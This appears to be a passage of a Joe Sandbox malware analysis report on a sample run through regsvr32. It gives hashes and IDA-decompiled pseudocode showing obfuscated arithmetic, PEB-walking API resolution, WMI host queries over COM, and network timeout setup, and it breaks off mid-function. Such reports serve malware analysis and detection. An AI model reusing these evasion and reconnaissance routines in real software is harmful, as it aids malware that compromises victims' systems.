                                          • Snapshot File: hcaresult_6_2_190000_regsvr32.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 43417e3a48edd8e43b5932f33cd2d7317c77091d1e192d168f64d6eb8d1270f9
                                          • Instruction ID: 91494660d7dd020b79389249f1f8f71fe9b739b5ac06b1dfbd5fd83ac262ad49
                                          • Opcode Fuzzy Hash: 43417e3a48edd8e43b5932f33cd2d7317c77091d1e192d168f64d6eb8d1270f9
                                          • Instruction Fuzzy Hash: 3BA13D72904504EFEF08DFA0C986B5A7BB5FF28311F1851A9DD0EDE189DB345A60DB28
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e5067ce0d69c97c32a38e7aeb3fef6c0114ffe29ce053d50af88417ef7cc46d5
                                          • Instruction ID: e10ac18f6a2dc82c047ac3a6231bc634579b0427d93bb8cac9548a9b95137502
                                          • Opcode Fuzzy Hash: e5067ce0d69c97c32a38e7aeb3fef6c0114ffe29ce053d50af88417ef7cc46d5
                                          • Instruction Fuzzy Hash: 817135356201758FE704CF2ADCD05BA33A1E78E34138AC629FA46CF395C535E626CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3fd2de03972cb3b7321cea2e293ceee1f2e46d12c6b89ea3bcf7c4ef0d5e13cb
                                          • Instruction ID: 8b2308eb0caa98c5fc40748196c6a291e313b8726404b2d010a505a218b38381
                                          • Opcode Fuzzy Hash: 3fd2de03972cb3b7321cea2e293ceee1f2e46d12c6b89ea3bcf7c4ef0d5e13cb
                                          • Instruction Fuzzy Hash: 175157B3B041B00BDF588E3D8C642757ED35AC515270EC2BAF9A9CB24AE978C7059760
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 79%
                                          			E001934DA(signed int __eax, signed int __ebx, signed int __ecx, void* __edx, signed int __edi, signed int __esi, signed int _a4) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				char _v68;
                                          				signed int _t41;
                                          				signed int _t43;
                                          				signed int _t45;
                                          				void* _t46;
                                          				signed int _t48;
                                          				signed int _t50;
                                          				signed int _t55;
                                          				signed int _t58;
                                          				signed int _t61;
                                          				void* _t64;
                                          				void* _t67;
                                          				signed int _t69;
                                          				signed int _t74;
                                          				signed int _t75;
                                          				signed int _t77;
                                          				signed int _t79;
                                          				signed int _t80;
                                          				signed int _t81;
                                          				signed int _t83;
                                          				signed int _t87;
                                          				signed int _t88;
                                          				signed int _t91;
                                          				signed int _t96;
                                          				signed int _t104;
                                          				signed int _t107;
                                          				signed int _t112;
                                          				void* _t122;
                                          				void* _t125;
                                          				signed int _t128;
                                          				signed int* _t131;
                                          
                                          				_push(__esi);
                                          				_push(__edi);
                                          				 *_t2 =  *((intOrPtr*)(__ebx + 0x4350b0));
                                          				_v20 = __eax;
                                          				_t41 = _v20;
                                          				_t87 = __edi & 0x00000000 | __eax ^ _v20 ^ _a4 | __edi & 0x00000000 | __eax ^ _v20 ^ _a4;
                                          				_t104 = _t87;
                                          				_pop(_t88);
                                          				if(_t87 != 0) {
                                          					_push(__ebx);
                                          					_t43 = _t41 & 0x00000000 | __ebx ^  *_t131 ^  *(_t104 +  *((intOrPtr*)(_t104 + 0x3c)) + 0x34);
                                          					_pop(_t55);
                                          					_push(_v12);
                                          					 *_t131 =  *_t131 - _t43;
                                          					_pop( *_t10);
                                          					_v20 = _t55;
                                          					_v8 = _t43;
                                          					_t58 = _v20;
                                          					_t107 =  &_v68;
                                          					_t128 = _t125;
                                          					_v20 = _t88;
                                          					_t45 =  *_t107;
                                          					_t91 = _v20;
                                          					 *_t131 =  *_t131 | _t45;
                                          					_t46 = _t45;
                                          					if( *_t131 != 0) {
                                          						_v20 = _t58;
                                          						_t74 = __ecx & 0x00000000 | _t58 ^ _v20 |  *(_t107 + 4);
                                          						_t61 = _v20;
                                          						_t48 = _t46 + _v12 + _v8;
                                          						_push(_t107);
                                          						_t122 = (__esi & 0x00000000 ^ _t107 & 0x00000000 ^ _v8) + _v12;
                                          						while(1) {
                                          							 *_t131 =  *_t131 | _t74;
                                          							_t75 = _t74;
                                          							if( *_t131 == 0) {
                                          								goto L12;
                                          							}
                                          							_v16 = _t91;
                                          							_t112 = (0 ^  *_t48) + _t122;
                                          							_push(_t75);
                                          							_t77 = _t75 & 0x00000000 ^ _t128 ^  *_t131 ^  *(_t48 + 4);
                                          							_t128 = _t128;
                                          							_push(_t77);
                                          							_t64 = _t61;
                                          							_t79 = _t77 + 0xfffffff8 >> 1;
                                          							_t48 = _t48 + 8;
                                          							_t67 = _t64;
                                          							while(1) {
                                          								_t69 = _t79 | _t79;
                                          								_t80 = _t69;
                                          								_t67 = _t67;
                                          								if(_t69 == 0) {
                                          									break;
                                          								}
                                          								 *_t131 = 0xf000;
                                          								_t81 = _t112;
                                          								_t96 =  *_t48 & 0x0000ffff & _t81;
                                          								 *_t28 = _t80;
                                          								_t83 = _t81 & 0x00000000 ^ _v20;
                                          								_push(_t96);
                                          								 *_t131 =  *_t131 | _t96;
                                          								if( *_t131 != 0) {
                                          									_push(_t48);
                                          									_v20 = _t112;
                                          									_t50 = _t48 & 0x00000000 | _t112 ^ _v20 | _v12;
                                          									_t112 = _v20;
                                          									 *((intOrPtr*)(( *_t48 & 0xfff) + _t112)) =  *((intOrPtr*)(( *_t48 & 0xfff) + _t112)) + _t50;
                                          									_t48 =  *_t131;
                                          									_t131 = _t131 - 0xfffffffc;
                                          								}
                                          								_t48 = _t48 + 2;
                                          								_t112 = _t112;
                                          								_t79 = _t83 - 1;
                                          							}
                                          							_t91 =  *_t131;
                                          							_t131 =  &(_t131[1]);
                                          							_pop( *_t36);
                                          							_t74 = _v16 - _t91;
                                          							_t61 = _t67;
                                          						}
                                          					} else {
                                          					}
                                          				} else {
                                          				}
                                          				L12:
                                          				return _t48;
                                          			}






































                                          0x00193625
                                          0x00193628
                                          0x0019362b
                                          0x00193636
                                          0x00193638
                                          0x00193638
                                          0x00000000
                                          0x00193556
                                          0x00000000
                                          0x00193506
                                          0x00193644
                                          0x00193655

                                          Memory Dump Source
                                          • Source File: 00000006.00000002.618572860.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_190000_regsvr32.jbxd
                                          Similarity
                                          • Opcode ID: c7da7afeaca1ae1e62935734146bf3c6b14c390c8f3e2480dd3232c664faf8aa
                                          • Instruction ID: ba63872afdc65dfad842bd60f50e38b7593ad750159b7fe38e0e55500cfc5f5e
                                          • Opcode Fuzzy Hash: c7da7afeaca1ae1e62935734146bf3c6b14c390c8f3e2480dd3232c664faf8aa
                                          • Instruction Fuzzy Hash: D251A072A04215AFEB04CFAADC8576FF7B6FF88314F198639D564A7280DB746A108B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 60%
                                          			E00194495(signed int __eax, signed int __ebx, signed int __ecx, signed int __edx, signed int __edi, signed int __esi) {
                                          				signed int _v8;
                                          				signed int _t62;
                                          				signed int _t67;
                                          				signed int _t68;
                                          				signed int _t70;
                                          				signed int _t72;
                                          				signed int _t74;
                                          				signed int _t80;
                                          				signed int _t84;
                                          				signed int _t91;
                                          				signed int _t102;
                                          				signed int _t104;
                                          				signed int _t114;
                                          				signed int _t116;
                                          				void* _t121;
                                          				void* _t143;
                                          				signed int* _t147;
                                          
                                          				_push(__ecx);
                                          				_push(__edx);
                                          				_push(__edi);
                                          				_push(__esi);
                                          				if( *((intOrPtr*)(__ebx + 0x435571)) != 1) {
                                          					_v8 = __esi;
                                          					_t114 = __edi & 0x00000000 ^ (__esi & 0x00000000 |  *(__ebx + 0x43574e));
                                          					_push(__edx);
                                          					_t62 = __eax & 0x00000000 | __edx & 0x00000000 |  *(_t114 + 0x3c);
                                          					_pop(_t102);
                                          					_t116 =  *((intOrPtr*)(_t62 + _t114 + 0x28)) +  *(__ebx + 0x4350b0);
                                          					_v8 = __ecx;
                                          					_t104 = _t102 & 0x00000000 ^ (__ecx ^ _v8 | _t116);
                                          					_t84 = _v8;
                                          					_v8 = _t84;
                                          					_t118 = _t116 & 0x00000000 | _t84 ^ _v8 |  *(__ebx + 0x4350b0);
                                          					_push(_t143);
                                          					_v8 = __ebx;
                                          					_t80 = _v8;
                                          					_v8 =  *((intOrPtr*)((_t62 & 0x00000000 ^ (_t143 -  *_t147 |  *((_t116 & 0x00000000 | _t84 ^ _v8 |  *(__ebx + 0x4350b0)) + 0x3c))) + _t118 + 0x28)) +  *(__ebx + 0x4350b0);
                                          					_t67 = 0 ^  *( *((intOrPtr*)((_v8 & 0x00000000 | __ebx & 0x00000000 |  *[fs:0x30]) + 0xc)) + 0xc);
                                          					__eflags = _t67;
                                          					_t91 = _t67;
                                          					_t68 = _v8;
                                          					while(1) {
                                          						 *_t35 =  *((intOrPtr*)(_t91 + 0x1c));
                                          						_push(_v8);
                                          						_pop(_t121);
                                          						__eflags = _t68 - _t121;
                                          						if(_t68 == _t121) {
                                          							break;
                                          						}
                                          						__eflags = _t104 - _t121;
                                          						if(__eflags != 0) {
                                          							_t91 =  *(_t91 + 4);
                                          							if(__eflags != 0) {
                                          								continue;
                                          							} else {
                                          								 *((intOrPtr*)(_t80 + 0x435571)) = 1;
                                          								_pop( *_t52);
                                          								_pop( *_t54);
                                          								_pop( *_t56);
                                          								_t70 =  *_t147;
                                          								__eflags = _t70;
                                          								return _t70;
                                          							}
                                          						} else {
                                          							_pop( *_t44);
                                          							_pop( *_t46);
                                          							_t72 = (_t68 & 0x00000000) + _v8;
                                          							__eflags = _t72;
                                          							return _t72;
                                          						}
                                          						goto L9;
                                          					}
                                          					 *_t37 = _t104;
                                          					_push(_v8);
                                          					_pop( *_t39);
                                          					_pop( *_t40);
                                          					_t74 = _t68 & 0x00000000 | _v8;
                                          					__eflags = _t74;
                                          					return _t74;
                                          				} else {
                                          					_pop( *_t2);
                                          					_pop( *_t4);
                                          					return (__eax & 0x00000000) + _t147[1];
                                          				}
                                          				L9:
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000006.00000002.618572860.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_190000_regsvr32.jbxd
                                          Similarity
                                          • Opcode ID: 0479555227218ebb414e8c4145d25bc2b41eb189c0fbb9efb8d710e990c1ccf4
                                          • Instruction ID: dc84b30d265ec74e3c86c2f19c5f8dd606e90ea4817ec52e08e285f37299e582
                                          • Opcode Fuzzy Hash: 0479555227218ebb414e8c4145d25bc2b41eb189c0fbb9efb8d710e990c1ccf4
                                          • Instruction Fuzzy Hash: 11513A77D11508EBEB04CF94DA42B9DB7B2FF94314F2981A9C845A7280C734AF11EB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                                          Similarity
                                          • Opcode ID: 8030d81dc236fa19504743191c490e51e4050de0e9408ade4ea3357c27d2e4ca
                                          • Instruction ID: 1f3934e2420efc180bb9c0cbc4fac13afaf5f650056083a87c6d8f741bd90931
                                          • Opcode Fuzzy Hash: 8030d81dc236fa19504743191c490e51e4050de0e9408ade4ea3357c27d2e4ca
                                          • Instruction Fuzzy Hash: 6E2192766150128BD35CDF2CD8A2A69F3A5FB48310F45427ED42BCB682CB71E492CB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 50%
                                          			E1000DB3C(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				char _v24;
                                          				void* _v28;
                                          				signed int _v32;
                                          				char _v36;
                                          				intOrPtr _v40;
                                          				signed int _v44;
                                          				char _v48;
                                          				char _v52;
                                          				intOrPtr _v56;
                                          				signed int _v60;
                                          				char* _v72;
                                          				signed short _v80;
                                          				signed int _v84;
                                          				char _v88;
                                          				char _v92;
                                          				char _v96;
                                          				intOrPtr _v100;
                                          				char _v104;
                                          				char _v616;
                                          				intOrPtr* _t159;
                                          				char _t165;
                                          				signed int _t166;
                                          				signed int _t173;
                                          				signed int _t178;
                                          				signed int _t186;
                                          				intOrPtr* _t187;
                                          				signed int _t188;
                                          				signed int _t192;
                                          				intOrPtr* _t193;
                                          				intOrPtr _t200;
                                          				intOrPtr* _t205;
                                          				signed int _t207;
                                          				signed int _t209;
                                          				intOrPtr* _t210;
                                          				intOrPtr _t212;
                                          				intOrPtr* _t213;
                                          				signed int _t214;
                                          				char _t217;
                                          				signed int _t218;
                                          				signed int _t219;
                                          				signed int _t230;
                                          				signed int _t235;
                                          				signed int _t242;
                                          				signed int _t243;
                                          				signed int _t244;
                                          				signed int _t245;
                                          				intOrPtr* _t247;
                                          				intOrPtr* _t251;
                                          				signed int _t252;
                                          				intOrPtr* _t253;
                                          				void* _t255;
                                          				intOrPtr* _t261;
                                          				signed int _t262;
                                          				signed int _t283;
                                          				signed int _t289;
                                          				char* _t298;
                                          				void* _t320;
                                          				signed int _t322;
                                          				intOrPtr* _t323;
                                          				intOrPtr _t324;
                                          				signed int _t327;
                                          				intOrPtr* _t328;
                                          				intOrPtr* _t329;
                                          
                                          				_v32 = _v32 & 0x00000000;
                                          				_v60 = _v60 & 0x00000000;
                                          				_v56 = __edx;
                                          				_v100 = __ecx;
                                          				_t159 = E1000D523(__ecx);
                                          				_t251 = _t159;
                                          				_v104 = _t251;
                                          				if(_t251 == 0) {
                                          					return _t159;
                                          				}
                                          				_t320 = E10008604(0x10);
                                          				_v36 = _t320;
                                          				_pop(_t255);
                                          				if(_t320 == 0) {
                                          					L53:
                                          					E1000861A( &_v60, 0xfffffffe);
                                          					E1000D5D7( &_v104);
                                          					return _t320;
                                          				}
                                          				_t165 = E100095E1(_t255, 0x536);
                                          				 *_t328 = 0x609;
                                          				_v52 = _t165;
                                          				_t166 = E100095E1(_t255);
                                          				_push(0);
                                          				_push(_v56);
                                          				_v20 = _t166;
                                          				_push(_t166);
                                          				_push(_a4);
                                          				_t322 = E100092E5(_t165);
                                          				_v60 = _t322;
                                          				E100085D5( &_v52);
                                          				E100085D5( &_v20);
                                          				_t329 = _t328 + 0x20;
                                          				if(_t322 != 0) {
                                          					_t323 = __imp__#2;
                                          					_v40 =  *_t323(_t322);
                                          					_t173 = E100095E1(_t255, 0x9e4);
                                          					_v20 = _t173;
                                          					_v52 =  *_t323(_t173);
                                          					E100085D5( &_v20);
                                          					_t324 = _v40;
                                          					_t261 =  *_t251;
                                          					_t252 = 0;
                                          					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
                                          					__eflags = _t178;
                                          					if(_t178 != 0) {
                                          						L52:
                                          						__imp__#6(_t324);
                                          						__imp__#6(_v52);
                                          						goto L53;
                                          					}
                                          					_t262 = _v32;
                                          					_v28 = 0;
                                          					_v20 = 0;
                                          					__eflags = _t262;
                                          					if(_t262 == 0) {
                                          						L49:
                                          						 *((intOrPtr*)( *_t262 + 8))(_t262);
                                          						__eflags = _t252;
                                          						if(_t252 == 0) {
                                          							E1000861A( &_v36, 0);
                                          							_t320 = _v36;
                                          						} else {
                                          							 *(_t320 + 8) = _t252;
                                          							 *_t320 = E100091E3(_v100);
                                          							 *((intOrPtr*)(_t320 + 4)) = E100091E3(_v56);
                                          						}
                                          						goto L52;
                                          					} else {
                                          						goto L6;
                                          					}
                                          					while(1) {
                                          						L6:
                                          						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
                                          						__eflags = _t186;
                                          						if(_t186 != 0) {
                                          							break;
                                          						}
                                          						_v16 = 0;
                                          						_v48 = 0;
                                          						_v12 = 0;
                                          						_v24 = 0;
                                          						__eflags = _v84;
                                          						if(_v84 == 0) {
                                          							break;
                                          						}
                                          						_t187 = _v28;
                                          						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
                                          						__eflags = _t188;
                                          						if(_t188 >= 0) {
                                          							__imp__#20(_v24, 1,  &_v16);
                                          							__imp__#19(_v24, 1,  &_v48);
                                          							_t46 = _t320 + 0xc; // 0xc
                                          							_t253 = _t46;
                                          							_t327 = _t252 << 3;
                                          							_t47 = _t327 + 8; // 0x8
                                          							_t192 = E10008698(_t327, _t47);
                                          							__eflags = _t192;
                                          							if(_t192 == 0) {
                                          								__imp__#16(_v24);
                                          								_t193 = _v28;
                                          								 *((intOrPtr*)( *_t193 + 8))(_t193);
                                          								L46:
                                          								_t252 = _v20;
                                          								break;
                                          							}
                                          							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
                                          							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E10008604( *(_t327 +  *_t253) << 3);
                                          							_t200 =  *_t253;
                                          							__eflags =  *(_t327 + _t200 + 4);
                                          							if( *(_t327 + _t200 + 4) == 0) {
                                          								_t136 = _t320 + 0xc; // 0xc
                                          								E1000861A(_t136, 0);
                                          								E1000861A( &_v36, 0);
                                          								__imp__#16(_v24);
                                          								_t205 = _v28;
                                          								 *((intOrPtr*)( *_t205 + 8))(_t205);
                                          								_t320 = _v36;
                                          								goto L46;
                                          							}
                                          							_t207 = _v16;
                                          							while(1) {
                                          								_v12 = _t207;
                                          								__eflags = _t207 - _v48;
                                          								if(_t207 > _v48) {
                                          									break;
                                          								}
                                          								_v44 = _v44 & 0x00000000;
                                          								_t209 =  &_v12;
                                          								__imp__#25(_v24, _t209,  &_v44);
                                          								__eflags = _t209;
                                          								if(_t209 < 0) {
                                          									break;
                                          								}
                                          								_t212 = E100091E3(_v44);
                                          								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
                                          								_t213 = _v28;
                                          								_t281 =  *_t213;
                                          								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
                                          								__eflags = _t214;
                                          								if(_t214 < 0) {
                                          									L39:
                                          									__imp__#6(_v44);
                                          									_t207 = _v12 + 1;
                                          									__eflags = _t207;
                                          									continue;
                                          								}
                                          								_v92 = E100095E1(_t281, 0x250);
                                          								 *_t329 = 0x4cc;
                                          								_t217 = E100095E1(_t281);
                                          								_t283 = _v80;
                                          								_v96 = _t217;
                                          								_t218 = _t283 & 0x0000ffff;
                                          								__eflags = _t218 - 0xb;
                                          								if(__eflags > 0) {
                                          									_t219 = _t218 - 0x10;
                                          									__eflags = _t219;
                                          									if(_t219 == 0) {
                                          										L35:
                                          										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E10008604(0x18);
                                          										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                                          										__eflags = _t289;
                                          										if(_t289 == 0) {
                                          											L38:
                                          											E100085D5( &_v92);
                                          											E100085D5( &_v96);
                                          											__imp__#9( &_v80);
                                          											goto L39;
                                          										}
                                          										_push(_v72);
                                          										_push(L"%d");
                                          										L37:
                                          										_push(0xc);
                                          										_push(_t289);
                                          										E10009640();
                                          										_t329 = _t329 + 0x10;
                                          										goto L38;
                                          									}
                                          									_t230 = _t219 - 1;
                                          									__eflags = _t230;
                                          									if(_t230 == 0) {
                                          										L33:
                                          										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E10008604(0x18);
                                          										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                                          										__eflags = _t289;
                                          										if(_t289 == 0) {
                                          											goto L38;
                                          										}
                                          										_push(_v72);
                                          										_push(L"%u");
                                          										goto L37;
                                          									}
                                          									_t235 = _t230 - 1;
                                          									__eflags = _t235;
                                          									if(_t235 == 0) {
                                          										goto L33;
                                          									}
                                          									__eflags = _t235 == 1;
                                          									if(_t235 == 1) {
                                          										goto L33;
                                          									}
                                          									L28:
                                          									__eflags = _t283 & 0x00002000;
                                          									if((_t283 & 0x00002000) == 0) {
                                          										_v88 = E100095E1(_t283, 0x219);
                                          										E10009640( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
                                          										E100085D5( &_v88);
                                          										_t329 = _t329 + 0x18;
                                          										_t298 =  &_v616;
                                          										L31:
                                          										_t242 = E100091E3(_t298);
                                          										L32:
                                          										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
                                          										goto L38;
                                          									}
                                          									_t242 = E1000DA20( &_v80);
                                          									goto L32;
                                          								}
                                          								if(__eflags == 0) {
                                          									__eflags = _v72 - 0xffff;
                                          									_t298 = L"TRUE";
                                          									if(_v72 != 0xffff) {
                                          										_t298 = L"FALSE";
                                          									}
                                          									goto L31;
                                          								}
                                          								_t243 = _t218 - 1;
                                          								__eflags = _t243;
                                          								if(_t243 == 0) {
                                          									goto L38;
                                          								}
                                          								_t244 = _t243 - 1;
                                          								__eflags = _t244;
                                          								if(_t244 == 0) {
                                          									goto L35;
                                          								}
                                          								_t245 = _t244 - 1;
                                          								__eflags = _t245;
                                          								if(_t245 == 0) {
                                          									goto L35;
                                          								}
                                          								__eflags = _t245 != 5;
                                          								if(_t245 != 5) {
                                          									goto L28;
                                          								}
                                          								_t298 = _v72;
                                          								goto L31;
                                          							}
                                          							__imp__#16(_v24);
                                          							_t210 = _v28;
                                          							 *((intOrPtr*)( *_t210 + 8))(_t210);
                                          							_t252 = _v20;
                                          							L42:
                                          							_t262 = _v32;
                                          							_t252 = _t252 + 1;
                                          							_v20 = _t252;
                                          							__eflags = _t262;
                                          							if(_t262 != 0) {
                                          								continue;
                                          							}
                                          							L48:
                                          							_t324 = _v40;
                                          							goto L49;
                                          						}
                                          						_t247 = _v28;
                                          						 *((intOrPtr*)( *_t247 + 8))(_t247);
                                          						goto L42;
                                          					}
                                          					_t262 = _v32;
                                          					goto L48;
                                          				} else {
                                          					E1000861A( &_v36, _t322);
                                          					_t320 = _v36;
                                          					goto L53;
                                          				}
                                          			}

                                          APIs
                                            • Part of subcall function 1000D523: CoInitializeEx.OLE32(00000000,00000000), ref: 1000D536
                                            • Part of subcall function 1000D523: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 1000D547
                                            • Part of subcall function 1000D523: CoCreateInstance.OLE32(1001B848,00000000,00000001,1001B858,?), ref: 1000D55E
                                            • Part of subcall function 1000D523: SysAllocString.OLEAUT32(00000000), ref: 1000D569
                                            • Part of subcall function 1000D523: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 1000D594
                                            • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                                          • SysAllocString.OLEAUT32(00000000), ref: 1000DBE5
                                          • SysAllocString.OLEAUT32(00000000), ref: 1000DBF9
                                          • SysFreeString.OLEAUT32(?), ref: 1000DF82
                                          • SysFreeString.OLEAUT32(?), ref: 1000DF8B
                                            • Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: String$Alloc$Free$HeapInitialize$BlanketCreateInstanceProxySecurity
                                          • String ID: FALSE$TRUE
                                          • API String ID: 224402418-1412513891
                                          • Opcode ID: 95ff9ab5d061d96dc60c0cf74fe266a414f7d2914be56b1a19689f674a06e878
                                          • Instruction ID: 5411e9e7cadc0f68074cac65ab41d21575f1dfdd33ecf7b2672d11ac1b24c815
                                          • Opcode Fuzzy Hash: 95ff9ab5d061d96dc60c0cf74fe266a414f7d2914be56b1a19689f674a06e878
                                          • Instruction Fuzzy Hash: 13E16375D002199FEB15EFE4C885EEEBBB9FF48380F10415AF505AB259DB31AA01CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 83%
                                          			E1000E668(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
                                          				char _v8;
                                          				char _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				char _v24;
                                          				intOrPtr _v28;
                                          				char _v32;
                                          				intOrPtr _v36;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				intOrPtr _v48;
                                          				intOrPtr _v52;
                                          				intOrPtr _v56;
                                          				intOrPtr _v60;
                                          				char _v64;
                                          				int _v76;
                                          				void* _v80;
                                          				intOrPtr _v100;
                                          				int _v104;
                                          				void* _v108;
                                          				intOrPtr _v112;
                                          				intOrPtr _v116;
                                          				char* _v120;
                                          				void _v124;
                                          				char _v140;
                                          				void _v396;
                                          				void _v652;
                                          				intOrPtr _t105;
                                          				intOrPtr _t113;
                                          				intOrPtr* _t115;
                                          				intOrPtr _t118;
                                          				intOrPtr _t121;
                                          				intOrPtr _t124;
                                          				intOrPtr _t127;
                                          				intOrPtr _t131;
                                          				char _t133;
                                          				intOrPtr _t136;
                                          				char _t138;
                                          				char _t139;
                                          				intOrPtr _t141;
                                          				intOrPtr _t147;
                                          				intOrPtr _t154;
                                          				intOrPtr _t158;
                                          				intOrPtr _t162;
                                          				intOrPtr _t164;
                                          				intOrPtr _t166;
                                          				intOrPtr _t172;
                                          				intOrPtr _t176;
                                          				void* _t183;
                                          				void* _t185;
                                          				intOrPtr _t186;
                                          				char _t195;
                                          				intOrPtr _t203;
                                          				intOrPtr _t204;
                                          				signed int _t209;
                                          				void _t212;
                                          				intOrPtr _t213;
                                          				void* _t214;
                                          				intOrPtr _t216;
                                          				char _t217;
                                          				intOrPtr _t218;
                                          				signed int _t219;
                                          				signed int _t220;
                                          				void* _t221;
                                          
                                          				_v40 = _v40 & 0x00000000;
                                          				_v24 = 4;
                                          				_v36 = 1;
                                          				_t214 = __edx;
                                          				memset( &_v396, 0, 0x100);
                                          				memset( &_v652, 0, 0x100);
                                          				_v64 = E100095C7(0x85b);
                                          				_v60 = E100095C7(0xdc9);
                                          				_v56 = E100095C7(0x65d);
                                          				_v52 = E100095C7(0xdd3);
                                          				_t105 = E100095C7(0xb74);
                                          				_v44 = _v44 & 0;
                                          				_t212 = 0x3c;
                                          				_v48 = _t105;
                                          				memset( &_v124, 0, 0x100);
                                          				_v116 = 0x10;
                                          				_v120 =  &_v140;
                                          				_v124 = _t212;
                                          				_v108 =  &_v396;
                                          				_v104 = 0x100;
                                          				_v80 =  &_v652;
                                          				_push( &_v124);
                                          				_push(0);
                                          				_v76 = 0x100;
                                          				_push(E1000C379(_t214));
                                          				_t113 =  *0x1001e6a4; // 0x0
                                          				_push(_t214);
                                          				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
                                          					_t209 = 0;
                                          					_v20 = 0;
                                          					do {
                                          						_t115 =  *0x1001e6a4; // 0x0
                                          						_v12 = 0x8404f700;
                                          						_t213 =  *_t115( *0x1001e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
                                          						if(_t213 != 0) {
                                          							_t195 = 3;
                                          							_t185 = 4;
                                          							_v8 = _t195;
                                          							_t118 =  *0x1001e6a4; // 0x0
                                          							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
                                          							_v8 = 0x3a98;
                                          							_t121 =  *0x1001e6a4; // 0x0
                                          							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
                                          							_v8 = 0x493e0;
                                          							_t124 =  *0x1001e6a4; // 0x0
                                          							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
                                          							_v8 = 0x493e0;
                                          							_t127 =  *0x1001e6a4; // 0x0
                                          							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
                                          							_t131 =  *0x1001e6a4; // 0x0
                                          							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
                                          							if(_a24 != 0) {
                                          								E1000980C(_a24);
                                          							}
                                          							if(_t186 != 0) {
